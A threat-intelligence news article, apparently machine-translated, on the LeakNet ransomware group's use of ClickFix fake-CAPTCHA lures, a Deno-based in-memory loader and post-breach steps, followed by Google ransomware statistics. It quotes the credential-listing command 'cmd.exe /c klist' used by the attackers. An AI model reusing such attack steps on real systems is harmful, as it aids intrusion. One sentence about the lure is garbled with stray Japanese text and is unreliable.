The ransomware campaign known as LeakNet employed ClickFix social engineering tactics delivered through compromised websites as its initial access method.
The use of ClickFix, which allows users to be tricked into manually running malicious commands to address non-existent errors, is a departure from relying on traditional methods of gaining initial access, such as stealing credentials obtained from an initial access broker (IAB), ReliaQuest said in a technical report published today.
The second key aspect of these attacks is the use of a staged command-and-control (C2) loader built on top of the Deno JavaScript runtime to execute the malicious payload directly in memory.
“The key here is that both entry vectors lead to the same repeatable post-exploitation sequence every time,” the cybersecurity firm said. “This gives defenders the ability to be specific: Regardless of how LeakNet enters, it is a known behavior that can be detected and stopped at each stage of the ransomware, well before it is deployed.”
LeakNet first emerged in November 2024, calling itself a “digital watchdog” and positioning its activities as focused on internet freedom and transparency. According to data collected by Dragos, the group also targets industrial associations.
Using ClickFix to compromise victims provides several benefits. Most importantly, it reduces dependence on third-party suppliers, reduces acquisition cost per victim, and eliminates the operational bottleneck of waiting for valuable accounts to come to market.
These attacks use legitimate but compromised sites to force users to copy the “msiexec.exe” command and install Windows.[ファイル名を指定して実行]It provides a fake CAPTCHA validation check that you are asked to paste into a dialog. Attacks are not limited to any particular industry, but cast a wide net to infect as many victims as possible.
This development comes as more threat actors adopt the ClickFix playbook. This playbook exploits trusted, everyday workflows to lure users into executing malicious commands through legitimate Windows tools in a seemingly routine and safe manner.
“LeakNet’s adoption of ClickFix represents the first documented expansion of the group’s early access capabilities as well as a meaningful strategic shift,” ReliaQuest said.
“By moving away from the IAB, LeakNet removes dependencies that naturally limit its rapid and widespread operation. Also, because ClickFix is delivered through a legitimate (but compromised) website, it does not present the same obvious signals at the network layer as attacker-owned infrastructure.”
In addition to using ClickFix to initiate the attack chain, LeakNet is credited with using a Deno-based loader to execute Base64-encoded JavaScript directly in memory to minimize on-disk evidence and avoid detection. This payload is designed to fingerprint a compromised system, connect to an external server to retrieve the next stage of malware, and enter into a polling loop that repeatedly retrieves and executes additional code via Deno.
Separately, ReliaQuest announced that it also observed intrusion attempts in which threat actors used Microsoft Teams-based phishing to socially engineer users into launching payload chains, ultimately spawning similar Deno-based loaders. Although the cause of this activity remains unknown, the use of a BYOR (Bring Your Own Runtime) approach indicates an expansion of LeakNet’s initial access vector or that other threat actors have adopted this technique.
LeakNet’s post-breach activities follow a consistent methodology. That is, it begins by using DLL sideloading to launch a malicious DLL delivered via the loader, followed by lateral movement, data exfiltration, and encryption using PsExec.
“LeakNet runs cmd.exe /c klist, a built-in Windows command that displays active authentication credentials on a compromised system. This allows attackers to act faster and more cautiously by knowing which accounts and services are already accessible without requiring new credentials,” ReliaQuest said.
“For staging and exfiltration, LeakNet uses S3 buckets and leverages the appearance of regular cloud traffic to reduce the discovery footprint.”
The development comes after Google revealed that Qilin (aka Agenda), Akira (aka RedBike), Cl0p, Play, SafePay, INC Ransom, Lynx, RansomHub, DragonForce (aka FireFlame and FuryStorm), and Sinobi emerged as the top 10 ransomware brands with the most reported victims on data breach sites.
“In one-third of incidents, the first access path was a known or suspected exploit of a vulnerability, mostly in a common VPN or firewall,” Google Threat Intelligence Group (GTIG) said, adding that 77% of ransomware intrusions analyzed involved suspected data theft, up from 57% in 2024.
“Despite the continued disruption caused by adversary conflict and disruption, ransomware attackers remain highly motivated and the extortion ecosystem shows continued resilience. However, several indicators suggest that the overall profitability of these activities is declining, and that at least some threat actors are shifting their targeting calculations away from large enterprises and instead focusing on high-volume attacks against small organizations.”
Source link
